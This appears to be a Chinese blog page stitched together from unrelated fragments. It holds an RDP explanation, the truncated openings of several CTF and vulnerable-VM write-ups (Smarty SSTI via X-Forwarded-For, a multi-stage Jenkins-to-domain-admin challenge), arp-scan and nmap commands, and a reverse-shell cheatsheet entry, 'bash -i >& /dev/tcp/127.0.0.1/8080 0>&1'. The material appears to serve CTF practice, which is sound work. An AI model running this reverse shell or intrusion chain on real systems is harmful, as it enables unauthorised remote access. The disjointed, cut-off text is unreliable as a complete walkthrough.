什么是 RDP

Remote Desktop Protocol（RDP），远程桌面协议，是一个多通道的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器端或称“远程电脑”）。大部分的 Windows、Linux、FreeBSD、Mac OS X 都有相应的客户端。服务端听取送到 TCP 3389 端口的数据。

功能演示

• 新建文件
  
• 测试单组样例
  
• 测试多组样例
  

题目来源：CISCN-2019 华东南-Web11

WriteUp

观察首页，在 footer 发现到是 PHP 的 smarty 模板引擎

随手在 X-Forwarded-For 写入一个 IP，可以看到 Current IP 显示了我们写入的 IP，于是可以判断他是通过 X-Forwarded-For 来获取 IP 的，猜测存在 SSTI 漏洞。

获取靶机信息

题目给出 IP: 39.103.138.101

题目描述

• 第一关：请获取 XR Shop 官网源码的备份文件，并尝试获得系统上任意文件读取的能力。并且，管理员在配置 Jenkins 时，仍然选择了使用初始管理员密码，请尝试读取该密码并获取 Jenkins 服务器权限。Jenkins 配置目录为 C:\ProgramData\Jenkins.jenkins。

• 第二关：管理员为 Jenkins 配置了 Gitlab，请尝试获取 Gitlab API Token，并最终获取 Gitlab 中的敏感仓库。获取敏感信息后，尝试连接至 Oracle 数据库，并获取 ORACLE 服务器控制权限。

• 第三关：攻击办公区内网，获取办公 PC 控制权限，并通过特权滥用提升至 SYSTEM 权限。

• 第四关：尝试接管备份管理操作员帐户，并通过转储 NTDS 获得域管理员权限，最终控制整个域环境。

题目来源：2022 网鼎杯半决赛

获取靶机信息

题目给出 IP：39.101.176.24

在首页中点击发现另一个页面 IP：39.98.202.121

题目来源：EMPIRE: BREAKOUT

获取靶机信息

靶机的 ip 地址为 192.168.7.127

arp-scan -l

反弹 Shell 命令大全，收录自Reverse-shell-cheatsheet

Bash TCP

Victim

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1

题目来源：JANGOW: 1.0.1

获取靶机信息

获得 ip 地址为 192.168.7.201

arp-scan -l

题目来源：THE PLANETS: EARTH

获取靶机信息

arp-scan -l
nmap -sP 192.168.7.0/24

在不同的节点中提供了不同的线路，请根据自己的需求选择合适的节点

关于节点